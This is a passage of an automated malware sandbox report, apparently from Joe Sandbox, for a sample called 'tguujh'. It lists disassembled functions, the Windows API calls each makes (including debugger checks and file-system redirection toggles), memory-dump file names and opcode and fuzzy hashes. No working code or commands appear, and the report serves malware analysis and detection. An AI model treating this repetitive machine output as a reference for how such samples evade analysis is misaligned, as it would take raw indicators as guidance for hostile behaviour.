                                                              Function 00C53A1C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00C94115
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                                • Part of subcall function 00C539DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C539FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen
                                                              • String ID: X
                                                              • API String ID: 779396738-3081909835
                                                              • Opcode ID: 44f728bf54a0cfb03d3d7612bebefc90f5627164e3a68554f3fdcc8a21839eab
                                                              • Instruction ID: 8fefaef36d66b4f6c861a450a001d2eab4904b53609f1bfd429e37655e866d1a
                                                              • Opcode Fuzzy Hash: 44f728bf54a0cfb03d3d7612bebefc90f5627164e3a68554f3fdcc8a21839eab
                                                              • Instruction Fuzzy Hash: C521C371A00288AFDF11DF94D805BEE7BF8AF48311F004019E805A7381DBB45ACD9BA5
                                                              Function 00CAE6E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00CAE6F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ComputerName
                                                              • String ID: X64
                                                              • API String ID: 3545744682-893830106
                                                              • Opcode ID: f4521bc3391b7520afcfe8ea6b3f1b75ea8fae300a5705c7e9f6df4ff48adc61
                                                              • Instruction ID: 4cb170ab0ea4faf53511361eaf83ffe090e8bea6eba2218d5e655626d0e198fa
                                                              • Opcode Fuzzy Hash: f4521bc3391b7520afcfe8ea6b3f1b75ea8fae300a5705c7e9f6df4ff48adc61
                                                              • Instruction Fuzzy Hash: 00D0C9B480521DEACBA0CF91DCC8EED737CBB14304F104856F002A2040DB7465489B50
                                                              Function 00CC95F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00CC9665
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CC9673
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                                              • String ID:
                                                              • API String ID: 3876400906-0
                                                              • Opcode ID: c8654afa7db0b666121d4517f4ccaadbdcdba0cded94ee94375f125a83eb2550
                                                              • Instruction ID: 1d293cb02e7dafa2d7359dafa956d49e70e361c20e2639f3f908cd580b02ad18
                                                              • Opcode Fuzzy Hash: c8654afa7db0b666121d4517f4ccaadbdcdba0cded94ee94375f125a83eb2550
                                                              • Instruction Fuzzy Hash: 491107796006299FCB01EB64C845D6EB7B5FF48360B058458EC56AB361CB30FD49DB94
                                                              Function 00C56E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C53B33,?,00008000), ref: 00C56E80
                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00C53B33,?,00008000), ref: 00C959A2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3f85459000144d9d3863565fff01af42ed2b47cef73cf317c16918d875fd65b7
                                                              • Instruction ID: 4d80b3b02a1da19ee6a195f5deae418b1cedcfc2f11af3d2cc6aee72ca512001
                                                              • Opcode Fuzzy Hash: 3f85459000144d9d3863565fff01af42ed2b47cef73cf317c16918d875fd65b7
                                                              • Instruction Fuzzy Hash: 74018035145221BAE7710A26CC0EF9B7F98EF02771F108210FEA96E1E0C7B45999CB94
                                                              Function 00C532A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00C532C4
                                                                • Part of subcall function 00C5326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C53282
                                                                • Part of subcall function 00C5326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C53299
                                                                • Part of subcall function 00C53312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C532EF,?), ref: 00C53342
                                                                • Part of subcall function 00C53312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C532EF,?), ref: 00C53355
                                                                • Part of subcall function 00C53312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D22418,00D22400,?,?,?,?,?,?,00C532EF,?), ref: 00C533C1
                                                                • Part of subcall function 00C53312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C53442
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C532FE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                              • String ID:
                                                              • API String ID: 1550534281-0
                                                              • Opcode ID: 837d18a06a6258f95df0db078c00088318742da214737be419fb501381e685c5
                                                              • Instruction ID: a5de297de14187d4d1dc7ca671092c07725a6de389c1d8af19f376b9af89dc9d
                                                              • Opcode Fuzzy Hash: 837d18a06a6258f95df0db078c00088318742da214737be419fb501381e685c5
                                                              • Instruction Fuzzy Hash: 0DF0B471518784AFE310EF60EC0AB383790A714306F004409B909C92F3DBB955969B24
                                                              Function 00C6F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00C6F97A
                                                                • Part of subcall function 00C5EE0B: GetInputState.USER32 ref: 00C5EEB7
                                                              • Sleep.KERNEL32(00000000), ref: 00CAFAC2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: InputSleepStateTimetime
                                                              • String ID:
                                                              • API String ID: 4149333218-0
                                                              • Opcode ID: 4fe34c3fab207ea138763c4581f77784138ac19ef3c64222f36c4419f2952744
                                                              • Instruction ID: 655dcbbad9e416408a65f5f91d25a7f20813474fc55bd884a327dd3116009a6b
                                                              • Opcode Fuzzy Hash: 4fe34c3fab207ea138763c4581f77784138ac19ef3c64222f36c4419f2952744
                                                              • Instruction Fuzzy Hash: E9F0EC712003019FC314EFA9D489B5AB7E8FF49321F00002AE84ACB260CB70A840CB94
                                                              Function 00C794D1 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C8506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00D19C08,00000010,00C794DE), ref: 00C850CC
                                                                • Part of subcall function 00C8506A: _free.LIBCMT ref: 00C850DA
                                                                • Part of subcall function 00C8510A: _free.LIBCMT ref: 00C8512C
                                                              • DeleteCriticalSection.KERNEL32(-00000020), ref: 00C794FA
                                                              • _free.LIBCMT ref: 00C7950E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _free$CriticalDeleteSection
                                                              • String ID:
                                                              • API String ID: 1906768660-0
                                                              • Opcode ID: ffb093cd220788c91b0e5796ae4d3d7767d8a17072dbc8c6ef4f7aae3116cee0
                                                              • Instruction ID: 4ebb444fa8b8e61e7bd154f83ae56154c59ea32169271d1dde110819261c75a6
                                                              • Opcode Fuzzy Hash: ffb093cd220788c91b0e5796ae4d3d7767d8a17072dbc8c6ef4f7aae3116cee0
                                                              • Instruction Fuzzy Hash: 90E0DF3B8046108BC7317768FC4AA0933F4FB6B354B058506F419C3220CF616C03A768
                                                              Function 00C58774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00C5AE65,?,?,?), ref: 00C58793
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00C5AE65,?,?,?), ref: 00C587C9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 626452242-0
                                                              • Opcode ID: 880341dd8c4cc877f02b6fe6caaf8630cb4f68f33aa4a19ef0139fa035d37484
                                                              • Instruction ID: 8db8098966f185a23011fbdaade88587df2bfbe565b5ba8b498d0c0fcec4b8b0
                                                              • Opcode Fuzzy Hash: 880341dd8c4cc877f02b6fe6caaf8630cb4f68f33aa4a19ef0139fa035d37484
                                                              • Instruction Fuzzy Hash: 3301F7753001047FEB18AB799C4BF7F7AADDB88350F20403EB506DA1D0EDA0AC449238
                                                              Function 00C5CA50 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 00C5CE8E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Init_thread_footer
                                                              • String ID:
                                                              • API String ID: 1385522511-0
                                                              • Opcode ID: 601c3d2907744489fab22d583e6b023e034d9560549d51a01bbb652d1393de98
                                                              • Instruction ID: d550a8f01c7e7cfadc6d9c8058f1b10fd8d937bd853f21a0db1399bc4bafeaa7
                                                              • Opcode Fuzzy Hash: 601c3d2907744489fab22d583e6b023e034d9560549d51a01bbb652d1393de98
                                                              • Instruction Fuzzy Hash: 0C32D278A003059FCB24CF58C8C5ABAB7B5EF55315F18805AEC26AB351C774EE85CB94
                                                              Function 00C7F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58f855d71b0b4a0cf203076532637a96a78adf69c7dc653e699fbe514739b9af
                                                              • Instruction ID: 7d18d63d846f09ff9b6a1e87e8dcc866f5c261f8f650ffb9f4774c4a59ae1afc
                                                              • Opcode Fuzzy Hash: 58f855d71b0b4a0cf203076532637a96a78adf69c7dc653e699fbe514739b9af
                                                              • Instruction Fuzzy Hash: B551B775A00108AFDB10DF68C880A697BB1EF85364F19C16CE86C9B392D771DD43CB90
                                                              Function 00C70000 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TerminateProcess.KERNELBASE ref: 00C700AF
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ProcessTerminate
                                                              • String ID:
                                                              • API String ID: 560597551-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 22b5dd04505c242d4b797a3e23288d4f5eea489054637669c51e2ea4facadd4b
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: C931C270A00105DBC718CF59C484A69F7A6FB59320B74C6AAE41ECB356D732EEC1CB90
                                                              Function 00CC8E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00CC8EBE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FullNamePathPrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1991638491-0
                                                              • Opcode ID: f64e2b5438fe42a523c6d473af2057cede78836af19f13fa415d9c16d018b905
                                                              • Instruction ID: 394ae944ca264300567f2da7d5e454692660c3727d3bc1b9438fc75ea6878b10
                                                              • Opcode Fuzzy Hash: f64e2b5438fe42a523c6d473af2057cede78836af19f13fa415d9c16d018b905
                                                              • Instruction Fuzzy Hash: F3214F3D600605AFCB01EB64C842CAEBBB5EF48361B048054F946AB371CB70BD89DB94
                                                              Function 00C5636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C56332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C5633E
                                                                • Part of subcall function 00C56332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C56350
                                                                • Part of subcall function 00C56332: FreeLibrary.KERNEL32(00000000,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56362
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C5639F
                                                                • Part of subcall function 00C562FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56304
                                                                • Part of subcall function 00C562FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C56316
                                                                • Part of subcall function 00C562FB: FreeLibrary.KERNEL32(00000000,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56329
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressFreeProc
                                                              • String ID:
                                                              • API String ID: 2632591731-0
                                                              • Opcode ID: cd9607810ab2ea3ac12818215b8180d8e80512bff87cd2347a6c97c60b7f90bf
                                                              • Instruction ID: 3ab3fefdb28ebed646599fdb886225332bbb9ab31a575de9efefd61e66c38aa0
                                                              • Opcode Fuzzy Hash: cd9607810ab2ea3ac12818215b8180d8e80512bff87cd2347a6c97c60b7f90bf
                                                              • Instruction Fuzzy Hash: 3D113A3A700204AACF10FB30CC02BAD77A19F50752FA0842DFC43AB1D1EEB09E89A754
                                                              Function 00C88792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: ab126dbee4aed7828cd77d06f247e1b3907a987afd115eb401800fa04db402ea
                                                              • Instruction ID: 6b8288e21c162b47f02204fc6086641aa5790bbbfc9f9a6c4150d7898d8946a3
                                                              • Opcode Fuzzy Hash: ab126dbee4aed7828cd77d06f247e1b3907a987afd115eb401800fa04db402ea
                                                              • Instruction Fuzzy Hash: 03115A7690420AAFCF15DF58E94099F7BF5EF48314F104069F808AB311DA30EA15CBA8
                                                              Function 00C5B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00C56B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00C5B0AC
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: e9d1e99f3a0d62918c24b260540b65f2cca5d9b4e1359d96454854e711865b8c
                                                              • Instruction ID: 6a64968ea834a4aeacb9d8040eb45c4f272ff2c98fda69b0444731d623245ce6
                                                              • Opcode Fuzzy Hash: e9d1e99f3a0d62918c24b260540b65f2cca5d9b4e1359d96454854e711865b8c
                                                              • Instruction Fuzzy Hash: 64113A75200705DFD7308E15C480B67BBE9EF84365F10C42DE9AA8BA91C771AD89CB64
                                                              Function 00C541E6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C533E9,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C54227
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FullNamePath_wcslen
                                                              • String ID:
                                                              • API String ID: 4019309064-0
                                                              • Opcode ID: 6e77e52b304bfa925ece0f0a2aa1374e3df6684768d23306f62ba3eaf93ab963
